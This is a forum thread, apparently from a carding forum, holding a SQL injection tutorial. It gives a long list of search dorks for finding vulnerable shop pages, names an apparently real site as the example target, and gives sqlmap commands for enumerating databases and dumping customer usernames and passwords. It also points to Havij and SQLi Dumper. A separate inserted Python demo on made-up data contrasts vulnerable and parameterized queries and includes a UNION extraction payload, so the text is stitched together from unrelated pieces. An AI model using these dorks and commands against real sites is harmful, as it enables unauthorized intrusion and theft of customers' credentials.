Database hacking tutorial | SQLI | SQL Injection



xeocops
05-17-2018, 10:27 AM
Hello, hacking lovers.
Today I am posting about how you can hack the database of a website using a technique called SQL injection.

Now, before I start, I want to let you know about some basic things used in SQL injection.

1. What is SQL?
Ans: SQL, or Structured Query Language, is a standard language for storing, accessing and manipulating databases.

2. What is the database?
Ans: A database is the backend of any website, where a structured set of data is stored on a computer/server so that it can be easily accessed and managed in various ways.

3. What is a web vulnerability?
Ans: A vulnerability is a state of being exposed to the possibility of an attack.

4. What is Injection in SQL?
Ans: Injection in SQL is a code injection technique used to insert code for execution in order to attack data-driven applications.

5. What are dorks?
Ans: A dork is a specific search query for an exploitable website, for example: products.php?id=, shop.asp?shopid=, etc.

6. What is a search engine?
Ans: Google, Yahoo, Bing.

Now, I want to move to the main part: how can we attack the database?

Mainly, what happens when a designer designs a website is that they mostly use HTML and CSS for design, PHP for scripting and MySQL for the database. This is common in almost 90% of websites today. Sometimes there are loopholes in the coding which let an attacker attack and dump/copy the database, change the database, etc.

If you have the right tools, it's not difficult to attack a website.

Here is the list of requirements you need before an attack.
1. Dorks
2. SQLMAP, SQLi Dumper or Havij Pro, etc.
3. little brains

So let's begin. (I AM NOT DEMONSTRATING THE MANUAL METHOD, SO REMEMBER YOU WILL NEED TOOLS)

1ST METHOD:::: SQLMAP

---> Get a dork you wish to use. Here's the list of private dorks you can use...
inurl: item.asp?prodtype=
inurl: item.asp?shopcd=
inurl: item.asp?sub_id=
inurl: item.cfm?eid=
inurl: item.cfm?item_id=
inurl: item.cfm?itemid=
inurl: item.cfm?model=
item.cfm?prodtype=
item.cfm?shopcd=
item.php?SKU=
item.php?cat=
item.php?code=
item.php?eid=
item.php?id=
item.php?iid=
item.php?item=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item.php?sub_id=
item/detail.php?num=
item/wpa-storefront-the-ultimate-wpecommerce-theme/discussion/61891?page=
itemDesc.asp?CartId=
itemDesc.cfm?CartId=
itemDesc.php?CartId=
item_book.asp?CAT=
item_book.php?CAT=
item_details.asp?catid=
item_details.cfm?catid=
item_details.php?catid=
item_id=
item_list.asp?cat_id=
item_list.asp?maingroup
item_list.cfm?maingroup
item_list.php?cat_id=
item_list.php?maingroup
item_show.asp?code_no=
item_show.asp?id=
item_show.asp?lid=
item_show.cfm?code_no=
item_show.php?code_no=
item_show.php?id=
item_show.php?itemID=
item_show.php?lid=
itemdetail.asp?item=
itemdetail.cfm?item=
itemdetail.php?item=
itemdetails.asp?catalogid=
itemdetails.cfm?catalogid=
itemdetails.php?catalogid=
itemlist.php?categoryID=
kr/product/product.php?gubun=
kshop/home.php?cat=
kshop/product.asp?productid=
kshop/product.php?productid=
order-now.php?prodid=
order.asp?BookID=
order.asp?id=
order.asp?item_ID=
order.asp?lotid=
order.cfm?BookID=
order.cfm?id=
order.cfm?item_ID=
order.php?BookID=
order.php?id=
order.php?item_ID=
order.php?l=
order.php?lang=
order.php?list=
order.php?ln=
order.php?p=
order.php?pag=
order.php?page=
order.php?pg=
order.php?wp=
order/cart/index.php?maincat_id=
prod.asp?cat=
prod.php?cat=
prod.php?prod=
prodView.asp?idProduct=
prodView.cfm?idProduct=
prodView.php?idProduct=
prod_detail.php?id=
prod_details.php?id=
prod_details.php?products_id=
prod_indiv.php?groupid=
prod_info.php?id=
prod_show.asp?id=
prod_show.asp?prodid=
prodbycat.asp?intCatalogID=
prodbycat.cfm?intCatalogID=
prodbycat.php?intCatalogID=
proddetail.php?prod=
proddetails_print.php?prodid=
prodetails.asp?prodid=
prodetails.cfm?prodid=
prodetails.php?prodid=
prodlist.asp?catid=
prodlist.cfm?catid=
prodlist.php?catid=
prodotti.asp?id_cat=
prodotti.php?id_cat=
prodrev.php?cat=
product-detail.php?prodid=
product-details.php?prodID=
product-info.php?cat=
product-item.php?id=
product-list.asp?category_id=
product-list.asp?cid=
product-list.asp?id=
product-list.php?category_id=
product-list.php?cid=
product-list.php?id=
product-range.asp?rangeID=
product-range.php?rangeID=
product.asp?****=
product.asp?ItemID=
product.asp?bid=
product.asp?bookID=
product.asp?cat=
product.asp?id=
product.asp?id_h=
product.asp?intProdID=
product.asp?intProductID=
product.asp?pid=
product.asp?prd=
product.asp?prodid=
product.asp?product=
product.asp?product_id=
product.asp?productid=
product.asp?shopprodid=
product.asp?sku=
product.cfm?bookID=
product.cfm?intProdID=
product.php?****=
product.php?ItemId=
product.php?bid=
product.php?bookID=
product.php?brand=
product.php?c=
product.php?cat=
product.php?cat_id=
product.php?fdProductId=
product.php?id=
product.php?id_h=
product.php?inid=
product.php?intProdID=
product.php?intProductID=
product.php?lang=
product.php?par=
product.php?pcid=
product.php?pid=
product.php?pl=
product.php?prd=
product.php?prod_num=
product.php?prodid=
product.php?product=
product.php?product_id=

----> Pick any dork and search it on Google; you'll get a list of websites from the Google search. Now, open any result you want. You'll get a site address like this one:
http://www.recklesserica.com/product.php?itemID=1004
itemID is the parameter here and 1004 is the value. Remember, you only have to use URLs with parameters. So now you have the URL with a parameter; you have to put a single inverted comma at the end of the URL, e.g. ----> http://www.recklesserica.com/product.php?itemID=1004' and hit enter. If you get an error on the page after hitting enter, like "Items Query Failed: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1", then this link is vulnerable to SQL injection, or SQLi.

----> Now that you've got the vulnerable link, it's time to open SQLMAP. For those who don't know what sqlmap is, please figure it out. The operating system is not a problem; you can run SQLMAP in Windows too.
(In Windows, download sqlmap, then in the folder hold "Shift", right-click and click "Open command window here". Remember you have to install Python before using sqlmap.)

---> Now the command will look like this:
>>> sqlmap -u [URL] --random-agent --tamper="between,space2comment" <<<< In Windows use sqlmap.py and the rest is the same.
-u = URL
--random-agent uses a random agent
and --tamper is for tamper scripts... There are other tamper scripts, but these two will work perfectly, don't worry about that.
So, the actual URL will look like this..
sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 --random-agent --tamper="between,space2comment" (LINUX)
& sqlmap.py -u http://www.recklesserica.com/product.php?itemID=1004 --random-agent --tamper="between,space2comment" (WINDOWS)
Remember, this is .py and not py. I'll go with Linux, so I will not tell you again.

---> Now hit "Enter" and you'll see the command is processing. Read the messages during the testing. sqlmap will ask you yes or no questions during testing; you have to read them and give input (that's why I said you need little brains).

---> Now, during this testing you'll probably see the message that the target is vulnerable to SQLi, and the testing finishes by asking whether you wish to do further testing. Simply type N and enter.

----> Once this testing finishes and you get the message that the target is vulnerable, you have to run another command, similar to the first one.
>>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 --dbs <<<< This will give you a list of databases,
e.g.
information_schema
DB775544

----> Now you can run these commands to navigate in the database.

---> For showing tables: >>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 -D DB775544 --tables <<<<
Output: a list of tables, e.g. admin, customers, orders, etc.

----> For showing columns in a table: >>>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 -D DB775544 -T customers --columns <<<<<
Output: a list of columns, e.g. username, password, etc.

----> Now you can copy or dump the data using this command:
>>>>> sqlmap -u http://www.recklesserica.com/product.php?itemID=1004 -D DB775544 -T customers -C username,password --dump <<<<<
and it'll copy the username and password columns.

2ND METHOD: Using HAVIJ PRO AND SQLI DUMPER
Havij and SQLi Dumper are GUIs for SQLi...
--> In Havij you have to provide the vulnerable link (I already described how to) and start the attack. Just follow the GUI interface to hack the database. It's simple; I'll not describe it in detail. It's a little different for SQLi Dumper, where you have to provide a list of dorks and start the analyzer; it'll analyze and give you results. You don't have to get links by Googling; it'll automatically make them.
These two tools are simple; I don't want to describe them here. For these tools, you can look further in this forum, Cardmafia.cc.

I really hope you enjoy the tutorial. Good luck hacking. ;)
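Editor's added example (not part of the post above, and not sqlmap's own code): the "loophole in the coding" the post refers to and the single-quote check it describes, reduced to a runnable script. A product lookup is written the vulnerable way (the ?itemID= value pasted straight into the SQL string) next to the parameterized version that closes the hole. It also shows the true/false comparison sqlmap falls back on when the page hides errors, and a UNION payload that pulls the customers table the way the --dump step does. The tables, rows and passwords are constructed for the demo, and sqlite3 stands in for MySQL/MariaDB so it runs offline; the error text therefore differs from the MariaDB message quoted in the post.

```python
"""Vulnerable vs. parameterized lookup for a ?itemID= parameter.

Added example: the schema, rows and payloads below are constructed for
this demo; sqlite3 is used in place of MySQL/MariaDB.
"""
import sqlite3


def make_db():
    """In-memory stand-in for the shop database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (itemID INTEGER, name TEXT, price REAL);
        CREATE TABLE customers (username TEXT, password TEXT);
        INSERT INTO products VALUES (1004, 'Widget', 9.99), (1005, 'Gadget', 19.99);
        INSERT INTO customers VALUES ('alice', 'hunter2'), ('bob', 'letmein');
        """
    )
    return conn


def lookup_vulnerable(conn, item_id):
    """The loophole: the raw query-string value becomes part of the SQL text."""
    sql = "SELECT itemID, name, price FROM products WHERE itemID = " + item_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, item_id):
    """The fix: a bound parameter is sent as data, never parsed as SQL."""
    sql = "SELECT itemID, name, price FROM products WHERE itemID = ?"
    return conn.execute(sql, (item_id,)).fetchall()


def probe_with_quote(conn):
    """The manual check from the post: append a quote, look for a syntax error.

    Returns the database error text if the quote broke the query, else None.
    """
    try:
        lookup_vulnerable(conn, "1004'")
    except sqlite3.OperationalError as err:
        return str(err)
    return None


def probe_boolean(conn):
    """What a scanner does when errors are not shown: a true condition must
    return the product and a false one must not.  True means injectable."""
    true_rows = lookup_vulnerable(conn, "1004 AND 1=1")
    false_rows = lookup_vulnerable(conn, "1004 AND 1=2")
    return len(true_rows) == 1 and len(false_rows) == 0


# Three columns to match the original SELECT; 0 marks the injected rows.
UNION_PAYLOAD = "1004 UNION SELECT 0, username, password FROM customers"


def dump_via_union(conn):
    """The automated --dump step in one query: rows from another table ride
    along with the product row.  Sorted so the result is deterministic."""
    rows = lookup_vulnerable(conn, UNION_PAYLOAD)
    return sorted((user, pw) for tag, user, pw in rows if tag == 0)


if __name__ == "__main__":
    db = make_db()
    print("quote probe error:", probe_with_quote(db))
    print("boolean probe says injectable:", probe_boolean(db))
    print("dumped via UNION:", dump_via_union(db))
    print("safe lookup, normal id:", lookup_safe(db, "1004"))
    print("safe lookup, quote payload:", lookup_safe(db, "1004'"))
    print("safe lookup, UNION payload:", lookup_safe(db, UNION_PAYLOAD))
```

Run stand-alone and the vulnerable function errors on the quote, answers the true/false probe differently, and hands over the customers rows, while the parameterized function returns the product for a plain id and an empty result for every payload, because the placeholder makes the whole string a value to compare against itemID rather than SQL to parse. The boolean probe is worth keeping in mind: a page that shows no error at all is not evidence that the parameter is safe, only that the error-based check in the post cannot see it.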

Dangvip1191
09-01-2018, 12:24 AM
Thank you!
How many versions of Havij Pro are there?

Blob
08-11-2019, 02:00 PM
Havij is dangerous, amigo.